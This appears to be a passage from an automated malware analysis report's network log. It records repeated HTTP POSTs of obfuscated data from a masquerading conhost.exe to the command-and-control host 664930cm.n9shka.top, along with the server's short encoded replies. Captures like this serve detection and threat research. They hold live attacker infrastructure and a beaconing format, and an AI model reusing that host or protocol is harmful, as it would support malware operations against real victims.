Oct 1, 2024 05:58:13.669439077 CEST | 1120 | OUT | Data Raw: 5d 51 5f 5e 59 43 51 55 5c 58 57 5a 54 58 55 5b 59 53 59 5b 50 5f 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]Q_^YCQU\XWZTXU[YSY[P_VC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!-#T"8[>Z$>2(-3(3X;%1&4)?2#+!F/'P,%
Oct 1, 2024 05:58:13.930177927 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:14.058001041 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 49759 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:14.186798096 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1112
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:14.543723106 CEST | 1112 | OUT | Data Raw: 5d 51 5f 5d 5c 42 51 55 5c 58 57 5a 54 5b 55 5b 59 53 59 59 50 5d 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]Q_]\BQU\XWZT[U[YSYYP]VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!,3(584[>!)['="_%#_8 7%>$2!&4=(24(!F/'P,!
Oct 1, 2024 05:58:14.821423054 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:14.956448078 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 49760 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:15.092366934 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:15.449654102 CEST | 1120 | OUT | Data Raw: 58 55 5f 59 59 42 51 52 5c 58 57 5a 54 5a 55 59 59 51 59 59 50 5d 56 45 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XU_YYBQR\XWZTZUYYQYYP]VE[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!,#/U"+?=-01#Y;7U3='&1W2B%(?(!F/'P,-
Oct 1, 2024 05:58:15.729161978 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:16.022836924 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P
Oct 1, 2024 05:58:16.078463078 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.6 | 49761 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:16.264693975 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1112
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:16.621526003 CEST | 1112 | OUT | Data Raw: 58 50 5f 5f 5c 45 51 51 5c 58 57 5a 54 5b 55 5b 59 52 59 57 50 51 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XP__\EQQ\XWZT[U[YRYWPQVD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\,#45+*2'>&^#/U+S%-<%2.Q&$>+8T(9!F/'P,!
Oct 1, 2024 05:58:16.870326042 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:16.997250080 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 49762 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:17.122769117 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:17.480849028 CEST | 1120 | OUT | Data Raw: 58 50 5f 5f 59 45 54 5f 5c 58 57 5a 54 53 55 5d 59 57 59 56 50 51 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XP__YET_\XWZTSU]YWYVPQVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!-#?"+)9[$22^ 8#3+%2&4&]<2?*)!F/'P,
Oct 1, 2024 05:58:17.728247881 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:17.861299038 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.6 | 49763 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:17.994857073 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:18.340296984 CEST | 1120 | OUT | Data Raw: 5d 55 5f 5d 5c 42 54 50 5c 58 57 5a 54 5d 55 5d 59 51 59 57 50 51 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]U_]\BTP\XWZT]U]YQYWPQVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"9 ?V6]<=)Z'6Y$;7Y/#+T%=$&W&21?#<9!F/'P,1
Oct 1, 2024 05:58:18.621289015 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:18.753087997 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.6 | 49764 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:18.034775019 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1840
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:18.387531042 CEST | 1840 | OUT | Data Raw: 58 53 5a 59 59 49 54 55 5c 58 57 5a 54 5d 55 51 59 55 59 56 50 5e 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XSZYYITU\XWZT]UQYUYVP^VI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_:U7W!+(])[3.2&3X/ ?$R2W!%>?2 ?)!F/'P,1
Oct 1, 2024 05:58:18.662667036 CEST | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.6 | 49765 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:18.948857069 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Oct 1, 2024 05:58:19.293462038 CEST | 1120 | OUT | Data Raw: 58 55 5f 5b 5c 42 54 53 5c 58 57 5a 54 5a 55 59 59 51 59 59 50 5c 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XU_[\BTS\XWZTZUYYQYYP\VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!-0/T!]4?2'&;</U',Q2P&:\(2??9!F/'P,-
Oct 1, 2024 05:58:19.556365967 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:19.687680006 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.6 | 49766 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:19.966725111 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:20.324604034 CEST | 1120 | OUT | Data Raw: 58 57 5f 59 59 48 51 54 5c 58 57 5a 54 5d 55 5b 59 54 59 5e 50 5d 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XW_YYHQT\XWZT]U[YTY^P]VG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-'T"4^>:'X"%;X/0;'><R&W=%B.[<!8T+!F/'P,1
Oct 1, 2024 05:58:20.581358910 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:20.709384918 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.6 | 49767 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:20.841829062 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Oct 1, 2024 05:58:21.199671984 CEST | 1120 | OUT | Data Raw: 58 52 5f 59 59 46 51 54 5c 58 57 5a 54 53 55 50 59 51 59 56 50 5a 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XR_YYFQT\XWZTSUPYQYVPZVF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!]97V!+<*!9&=6[&;+-#/T';$!&U%'.[?<9!F/'P,
Oct 1, 2024 05:58:21.451883078 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:21.581860065 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.6 | 49768 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:21.701327085 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1112
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:22.058988094 CEST | 1112 | OUT | Data Raw: 58 56 5a 5b 5c 42 51 56 5c 58 57 5a 54 5b 55 5f 59 53 59 5a 50 59 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XVZ[\BQV\XWZT[U_YSYZPYVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y9'R (8=T%^'&8'X8 '.(W21>$7%>"(U(9!F/'P,1
Oct 1, 2024 05:58:22.327554941 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:22.461812019 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.6 | 49769 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:22.590749025 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1112
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:22.949644089 CEST | 1112 | OUT | Data Raw: 5d 52 5a 5c 59 41 54 54 5c 58 57 5a 54 5b 55 5a 59 50 59 5e 50 5f 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]RZ\YATT\XWZT[UZYPY^P_VH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.#<68')1*0*1(;;%.;%V1!+" (!F/'P,%
Oct 1, 2024 05:58:23.225852013 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:23.358979940 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.6 | 49770 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:23.482027054 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.6 | 49771 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:23.887305021 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1840
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:24.246484995 CEST | 1840 | OUT | Data Raw: 5d 52 5a 5c 59 48 54 5f 5c 58 57 5a 54 5d 55 5d 59 57 59 5a 50 5c 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]RZ\YHT_\XWZT]U]YWYZP\VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.U "8<=19_'>$+;80$0<%12B!??!F/'P,1
Oct 1, 2024 05:58:24.509949923 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:24.640865088 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data Raw: 0e 1d 25 58 25 24 03 0b 21 3c 36 02 29 3f 24 05 30 37 3c 03 3a 13 30 08 26 59 3f 5e 2e 32 2d 05 2b 5f 2d 03 25 2e 34 00 32 0b 39 0b 33 0c 20 5f 0d 10 21 01 21 28 36 50 2f 17 28 05 3e 0f 30 41 32 33 2f 1f 24 0d 0f 0f 3f 00 24 1f 27 02 29 1e 27 3f 25 0f 2f 26 28 13 2b 34 2c 11 21 2b 2d 56 02 1e 22 50 25 5e 3d 55 23 3c 35 5c 30 2b 27 07 21 28 31 55 3e 2e 0e 5d 27 24 0c 17 29 13 38 01 2b 2c 3c 07 22 2a 03 5d 20 31 21 52 27 19 27 5c 20 0d 2d 51 05 34 5a 50
Data Ascii: %X%$!<6)?$07<:0&Y?^.2-+_-%.4293 _!!(6P/(>0A23/$?$')'?%/&(+4,!+-V"P%^=U#<5\0+'!(1U>.]'$)8+,<"*] 1!R''\ -Q4ZP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.6 | 49772 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:24.105957031 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:24.465333939 CEST | 1120 | OUT | Data Raw: 5d 57 5f 5e 59 47 54 50 5c 58 57 5a 54 5d 55 5b 59 5b 59 5e 50 5b 56 45 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: ]W_^YGTP\XWZT]U[Y[Y^P[VE[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y9+S!<^*"0)&$;0?'+2W22.[<2+(!F/'P,1
Oct 1, 2024 05:58:24.711977959 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:24.841279984 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
